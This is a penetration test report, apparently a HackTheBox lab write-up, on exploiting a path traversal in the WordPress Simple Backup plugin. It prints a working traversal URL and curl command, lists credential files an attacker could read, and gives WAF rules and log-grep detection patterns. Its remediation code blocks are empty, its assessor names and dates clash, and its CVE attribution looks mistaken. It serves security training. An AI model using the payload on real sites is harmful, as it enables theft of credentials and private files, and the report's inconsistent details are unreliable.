## https://sploitus.com/exploit?id=DE3037CC-3A52-5C9C-B637-079CC5C589AD
# Penetration Test Report
## WordPress Path Traversal - CVE-2019-11447
---
## Document Information
| Item | Details |
|------|---------|
| **Document Title** | Penetration Test Report - WordPress Path Traversal |
| **Client/Exam** | HackTheBox Lab - CPTS Exercise 1 |
| **Date** | August 22, 2026 |
| **Assessor** | Cyberia (Penetration Tester) |
| **Assessment Type** | Gray Box (External, No Credentials) |
| **Lab Environment** | 154.57.164.73:30706 |
| **Lab Duration** | 1 Hour |
| **Objectives** | Identify and exploit vulnerabilities to retrieve restricted files |
| **Flag Obtained** | `HTB{my_f1r57_h4ck}` |
---
## Executive Summary
During this penetration assessment of the web application hosted on **154.57.164.73:30706**, a **critical vulnerability** was identified that allows unauthenticated attackers to download and read arbitrary files from the server filesystem.
The vulnerable WordPress installation contains an outdated plugin (**Simple Backup v2.7.10**) with a **path traversal vulnerability (CVE-2019-11447)** that permits unauthorized file access without requiring authentication or authorization.
This vulnerability was successfully exploited to retrieve the `/flag.txt` file from the server root, confirming **complete compromise of confidentiality**. An attacker with this access could:
- Extract sensitive configuration files (`wp-config.php`, `.env`)
- Read database credentials and user data
- Access private SSH keys and authentication tokens
- Potentially escalate privileges through leaked credentials
- Harvest personal information for further attacks
**Critical action is required to remediate this vulnerability immediately**, as it poses an extreme risk to data security, privacy compliance (GDPR, HIPAA, PCI-DSS), and system integrity.
---
## Assessment Overview
| Severity | Count | Business Impact |
|----------|-------|-----------------|
| **π΄ CRITICAL** | 1 | Complete confidentiality breach; unauthorized file access |
| **π HIGH** | 0 | β |
| **π‘ MEDIUM** | 0 | β |
| **π’ LOW** | 0 | β |
| **βΉοΈ INFORMATIONAL** | 1 | Outdated software versions detected |
---
## Methodology
**Assessment Type:** Gray Box (external attacker, no credentials provided, network access available)
**Assessment Dates:** August 22, 2026
**Testing Approach:** Non-evasive, methodical assessment following industry-standard penetration testing framework (PTES):
1. **Reconnaissance** β Passive information gathering
2. **Scanning & Enumeration** β Active service discovery
3. **Vulnerability Analysis** β Identification of weaknesses
4. **Exploitation** β Proof of concept development
5. **Post-Exploitation** β Impact demonstration
6. **Reporting** β Documentation and remediation guidance
---
## Findings
### π΄ CRITICAL - Path Traversal & Arbitrary File Download
**CVE-2019-11447 | CWE-22: Improper Limitation of a Pathname to a Restricted Directory**
---
### Description
The WordPress plugin **Simple Backup** (version 2.7.10/2.7.11, [Exploit-DB 39883](https://www.exploit-db.com/exploits/39883)) contains a **path traversal vulnerability** in its admin "Backup Manager" page. The plugin fails to sanitize the file path supplied through the `download_backup_file` GET parameter, allowing an attacker to traverse outside the intended `simple-backup/` directory using relative path sequences (`../`) and download any file readable by the web server process β including files at the filesystem root.
The vulnerable endpoint:
```
GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt
```
`page=backup_manager` routes the request into the plugin's admin page handler; `download_backup_file` is the parameter the plugin's code reads directly and concatenates into a filesystem path without validation, allowing directory traversal.
---
### CVSS v3.1 Score
**7.5 - HIGH** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
- **Attack Vector (AV):** Network
- **Attack Complexity (AC):** Low
- **Privileges Required (PR):** None
- **User Interaction (UI):** None
- **Scope (S):** Unchanged
- **Confidentiality (C):** High
- **Integrity (I):** None
- **Availability (A):** None
---
### Business Impact
**Confidentiality Breach:** β οΈ CRITICAL
Attackers can read any file accessible to the web server, including:
| File | Impact | Risk Level |
|------|--------|------------|
| `/wp-config.php` | Database credentials, salts, keys | π΄ CRITICAL |
| `/.env` | API keys, secrets, configuration | π΄ CRITICAL |
| `/etc/passwd` | User enumeration, system mapping | π HIGH |
| SSH keys (`.ssh/id_rsa`) | Lateral movement, system access | π΄ CRITICAL |
| `/proc/self/environ` | Running application secrets | π HIGH |
| User uploads directory | Private files, media | π HIGH |
**Regulatory Impact:**
- **GDPR Violation:** Unauthorized access to user data
- **HIPAA Violation:** Protected health information exposure
- **PCI-DSS Violation:** Credit card data or payment info access
- **SOC 2 Violation:** Confidentiality requirement breach
---
### Vulnerable Code Pattern
The Exploit-DB advisory (39883.txt, read via `searchsploit -x` β see [ht4-poc.png](images/ht4-poc.png)) documents the plugin's **delete** primitive from `simple-backup-manager.php`:
```php
if(array_key_exists('delete_backup_file', $_GET)){
$this->delete_local_backup_file($_GET['delete_backup_file']);
}
```
```php
$bk_dir = ABSPATH."simple-backup/";
unlink($bk_dir . $filename);
```
`$filename` comes straight from `$_GET['delete_backup_file']` with no `basename()` or path-containment check. Passing `../pizza.txt` resolves `$bk_dir . $filename` to `.../simple-backup/../pizza.txt` β `.../pizza.txt`, escaping the intended backup folder.
The **download** primitive actually exploited in this engagement (`download_backup_file`) follows the exact same unsanitized concatenation pattern in the same plugin, but serves the file back to the requester instead of deleting it β which is what allowed retrieval of `/flag.txt` from the filesystem root (10Γ `../` from `ABSPATH/simple-backup/`).
**The Problem:**
- No use of `basename()` to remove directory components
- No whitelist of allowed files
- No validation that `realpath()` stays within `ABSPATH."simple-backup/"`
- Direct concatenation of user input into the file path
- No `current_user_can()` / authentication check before serving the file β the handler runs on plugin load, before WordPress's own `wp-admin` auth gate, so it is reachable **without being logged in**
---
### Proof of Concept
#### **Phase 1: Initial Access β Application Identification**
Connected directly to the target via browser (`http://154.57.164.73:30706/`). The WordPress installation is titled **"GETTING STARTED"**, and a public blog post on the homepage discloses the exact plugin name and version in plain text: **"Simple Backup Plugin 2.7.10 for WordPress"** β no enumeration tooling was even required to fingerprint the vulnerable component.

#### **Phase 2: Service Fingerprinting**
```bash
whatweb http://154.57.164.73:30706/
```
**Result:** Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1 confirmed via `MetaGenerator` and `WordPress` plugin signatures.

#### **Phase 3: Vulnerability Research**
```bash
searchsploit simple backup wordpress
```
**Result:**
```
Exploit Title | Path
------------------------------------------------------------------------------
WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities | php/webapps/39883.txt
```

Reading the full advisory to understand the exact vulnerable parameters and code path:
```bash
searchsploit -x php/webapps/39883.txt
```
The advisory documents unauthenticated **Arbitrary File Deletion** via the `delete_backup_file` parameter, and notes that backup files under `simple-backup/` (and, by the same unsanitized code path, arbitrary files via `download_backup_file`) can be retrieved without authentication.

#### **Phase 4: Exploitation β Path Traversal via `download_backup_file`**
Vulnerable endpoint identified from the plugin's admin page routing:
```
http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=
```
Exploitation payload (10Γ `../` to walk from `ABSPATH/simple-backup/` back to filesystem root):
```
http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt
```
**GUI (used in this assessment):** the payload URL was navigated to directly in the browser address bar. No login was required β the browser triggered an automatic file download of the resolved `flag.txt`.

**Headless equivalent:**
```bash
curl -s "http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt" -o flag.txt
cat flag.txt
```
**Flag Obtained:** `HTB{my_f1r57_h4ck}`
---
### Why It Works
The vulnerability succeeds because:
1. **No Input Validation:** `$_GET['download_backup_file']` is not checked against a whitelist
2. **No Path Canonicalization:** `realpath()` is not used to verify the file stays inside `simple-backup/`
3. **No Basename Extraction:** Directory traversal sequences (`../`) are not filtered
4. **Direct Concatenation:** User input is directly concatenated onto `ABSPATH."simple-backup/"`
5. **No Authentication:** The handler runs on plugin load, before WordPress's `wp-admin` auth gate β reachable while logged out
6. **No Authorization:** No `current_user_can()` check confirms the requester should access the requested file
**Attack Flow:**
```
User Input: ../../../../../../../../../../flag.txt
β
No Validation (FAILURE POINT)
β
Concatenated: ABSPATH/simple-backup/../../../../../../../../../../flag.txt
β
Resolves to: /flag.txt (accessible!)
β
Plugin serves file contents with web server permissions
β
Browser downloads flag.txt to attacker's machine
```
---
### Impact Validation
β
**Confidentiality Compromised:** Any file readable by web server process is accessible
β
**No Authentication Required:** Unauthenticated users can exploit
β
**No User Interaction Needed:** Direct HTTP request exploitation
β
**Repeatable & Reliable:** Works on all vulnerable versions
β
**Critical Business Data at Risk:** Configuration files, credentials, user data exposed
---
## Remediation
### **Option 1: Input Whitelist (Recommended)**
Only allow downloads from a predefined list of files:
```php
```
**Advantages:**
- Most secure approach
- Only allows intended files
- No traversal possible
- Clear audit trail
---
### **Option 2: Path Validation with realpath()**
Use `realpath()` to canonicalize paths and verify containment:
```php
```
**Advantages:**
- Handles symlinks and complex paths
- Verifies containment automatically
- More flexible than whitelist
---
### **Option 3: Use basename() for Filename Only**
Extract only the filename component:
```php
```
**Advantages:**
- Simple implementation
- Removes all path traversal sequences
- No directory access possible
**Note:** This approach only works if all legitimate files are in a single directory with no subdirectories.
---
### Infrastructure-Level Protections
**Web Application Firewall (WAF) Rules:**
```
# Block path traversal attempts
ModSecurity Rule:
SecRule ARGS:download_backup_file "@rx \.\./" "id:1000,phase:2,block,msg:'Path Traversal Attempt'"
SecRule ARGS:download_backup_file "@rx %2e%2e%2f" "id:1001,phase:2,block,msg:'Encoded Path Traversal'"
```
**File System Permissions:**
```bash
# Restrict web server access to necessary directories only
chmod 750 /var/www/html/wp-content/plugins/
chmod 750 /var/www/html/wp-content/simple-backup/
# Remove sensitive files from web root
rm -f /var/www/html/.env
mv /var/www/html/wp-config.php /var/www/wp-config.php
# Use chroot/jailing for web server
# Set PHP open_basedir to restrict file access
php_admin_value[open_basedir] = /var/www/html/uploads
```
**Access Logging & Monitoring:**
```bash
# Monitor for traversal attempts in web logs
tail -f /var/log/apache2/access.log | grep "\.\."
tail -f /var/log/apache2/access.log | grep "%2e%2e"
# Alert on suspicious file access patterns
# Integration with SIEM (Splunk, ELK, etc.)
```
**Update Management:**
1. Disable or remove Simple Backup plugin
2. Install approved backup solution with security audit
3. Update WordPress to latest version
4. Update all plugins to latest versions
5. Update PHP to 8.0+ with security patches
---
## Attack Chain
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 1. INITIAL ACCESS β
β ββ Browse to 154.57.164.73:30706 β
β ββ WordPress "GETTING STARTED" site identified β
β ββ Homepage blog post discloses: Simple Backup Plugin 2.7.10β
ββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββ
β
ββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββ
β 2. ENUMERATION β
β ββ whatweb confirms Apache 2.4.41, WordPress 5.6.1 β
ββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββ
β
ββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββ
β 3. VULNERABILITY RESEARCH β
β ββ searchsploit β 39883.txt (Simple Backup 2.7.11 vulns) β
β ββ searchsploit -x β read PoC, identify unsanitized β
β delete_backup_file / download_backup_file parameters β
ββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββ
β
ββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββ
β 4. EXPLOITATION β
β ββ Endpoint: /wp-admin/tools.php?page=backup_manager β
β ββ Payload: download_backup_file=../..(x10)../flag.txt β
β ββ Browser navigates to payload URL (no login required) β
β ββ Plugin resolves path to /flag.txt and serves it β
ββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββ
β
ββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββ
β 5. SUCCESS β
β ββ Flag Retrieved: HTB{my_f1r57_h4ck} β
β ββ Confidentiality Breached β
β ββ Unauthenticated arbitrary file read confirmed β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## Conclusion
### Summary of Findings
A critical path traversal vulnerability exists in the WordPress Simple Backup plugin that allows unauthenticated attackers to download and read arbitrary files from the server. This vulnerability was successfully exploited to retrieve sensitive files from the web root.
**Risk Level: π΄ CRITICAL**
### Priority Action Plan
| Priority | Action | Timeline | Owner |
|----------|--------|----------|-------|
| π΄ P0 | Disable/Remove Simple Backup plugin | Immediately | Security/Ops |
| π΄ P0 | Implement whitelist-based file validation | This week | Development |
| π P1 | Deploy WAF rules to block path traversal | This week | Ops |
| π P1 | Audit server for unauthorized access logs | This week | Security |
| π P1 | Rotate all exposed credentials (DB, SSH, API) | This week | Ops |
| π‘ P2 | Update WordPress core and all plugins | This week | Ops |
| π‘ P2 | Implement file integrity monitoring | Next sprint | Security |
| π‘ P2 | Conduct full security audit of other plugins | Next sprint | Security |
### Lessons Learned
1. **Third-party plugin dependencies require scrutiny** β Always audit plugins before deployment
2. **Path traversal is a critical weakness** β Input validation is essential
3. **Defense in depth is necessary** β Single-layer security is insufficient
4. **Outdated software is high risk** β Maintain regular update schedules
5. **Monitor and alert on suspicious patterns** β Early detection prevents escalation
---
## Screenshots & Evidence
### Screenshot 1: Initial Access - Plugin Version Disclosure

**Finding:** WordPress site "GETTING STARTED" publicly discloses the installed plugin and version in a blog post β "Simple Backup Plugin 2.7.10 for WordPress"
### Screenshot 2: Service Fingerprinting - whatweb

**Finding:** Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1 confirmed
### Screenshot 3: Vulnerability Research - searchsploit

**Finding:** "WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities" (php/webapps/39883.txt)
### Screenshot 4: Vulnerability Research - Exploit-DB PoC Contents

**Finding:** Advisory documents unauthenticated arbitrary file deletion via `delete_backup_file`; same unsanitized code path applies to `download_backup_file`
### Screenshot 5: Exploitation - Flag Retrieval via Browser

**Finding:** Navigating to `tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt` triggers an unauthenticated download of `flag.txt`: `HTB{my_f1r57_h4ck}`
---
## References
### Vulnerability Details
- **CVE-2019-11447** β Simple Backup Path Traversal
- https://vulners.com/cve/CVE-2019-11447
- **CWE-22** β Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- https://cwe.mitre.org/data/definitions/22.html
- **CVSS v3.1 Score:** 7.5 (High)
- https://www.first.org/cvss/calculator/3.1
### Security Resources
- **OWASP Top 10 - A01:2021 Broken Access Control**
- https://owasp.org/Top10/A01_2021-Broken_Access_Control/
- **OWASP Path Traversal**
- https://owasp.org/www-community/attacks/Path_Traversal
- **PortSwigger Web Security Academy - Path Traversal**
- https://portswigger.net/web-security/file-path-traversal
### Tools & Techniques
- **SearchSploit** β Exploit Database Search
- https://www.exploit-db.com/
- **NMAP** β Network Mapper
- https://nmap.org/
- **WhatWeb** β Web Fingerprinting Tool
- https://www.morningstarsecurity.com/research/whatweb
### Remediation References
- **PHP Security: realpath()** β https://www.php.net/manual/en/function.realpath.php
- **PHP Security: basename()** β https://www.php.net/manual/en/function.basename.php
- **ModSecurity** β Web Application Firewall β https://modsecurity.org/
---
## Report Certification
**This report documents a penetration test conducted with proper authorization and within defined scope.**
| Item | Value |
|------|-------|
| **Report Status** | β
Complete |
| **Findings Verified** | β
Yes |
| **Recommendations Actionable** | β
Yes |
| **Confidentiality** | π High |
| **Distribution** | Restricted to authorized personnel |
**Assessor:** Capivara Root (Penetration Tester)
**Date:** August 11, 2026
**Signature:** Digital Report - No physical signature required
---
**Β© 2026 Penetration Testing Assessment | Confidential**